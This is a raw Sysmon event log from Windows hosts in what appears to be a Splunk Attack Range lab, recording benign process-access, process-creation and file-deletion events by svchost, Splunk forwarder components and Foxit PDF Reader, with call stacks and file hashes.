12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016648Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016647Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016646Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016645Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016644Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016643Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016642Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E488-63C7-0702-00000000B002}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016641Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E488-63C7-0702-00000000B002}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016640Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:32.298{E5A8D418-E488-63C7-0702-00000000B002}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000042158Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.505{FE4C2B44-E488-63C7-2D06-00000000AF02}39406320C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042157Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E488-63C7-2D06-00000000AF02}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042156Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042155Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042154Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042153Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042152Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E488-63C7-2D06-00000000AF02}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042151Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.365{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E488-63C7-2D06-00000000AF02}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042150Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.366{FE4C2B44-E488-63C7-2D06-00000000AF02}3940C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000042149Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.159{FE4C2B44-DE08-63C7-F104-00000000AF02}60683364C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(00000000136003D0) 23542300x800000000000000042148Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.142{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=7179C1DD636151F308E42AC9DC3E7365,SHA256=C451CA8E0C49864F44DB0BC7F3C20BEA23DCC8EE3DCDCFFD427FB730DE5B6409,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042147Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.013{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=5909214FAE73BCCDC498170E802BDA0D,SHA256=D81ACD5744A314DE24AFD2F7888BAD66FE8650EEE14F38AA9CC2378160BFF3F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042146Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.013{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\ADMINI~1\AppData\Local\Temp\etilqs_xW4ooG5XSYJhRBWMD5=0ADA76E83815BEC0481D784181C6C7B1,SHA256=BA7D9A81ADE28D4F79600893AC46AB87F76A2F0B45169793B13FCDDA32D745CE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000042145Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:32.001{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=860D92EAA5A03CCAC612E09C18F35536,SHA256=7BEB0DFD3ACD2D7D641E55229D8C0741B2C8BC32FB98DF79555D6B1521AC3947,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000042178Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E489-63C7-2F06-00000000AF02}3916C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042177Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042176Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042175Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:33.958{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042174Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 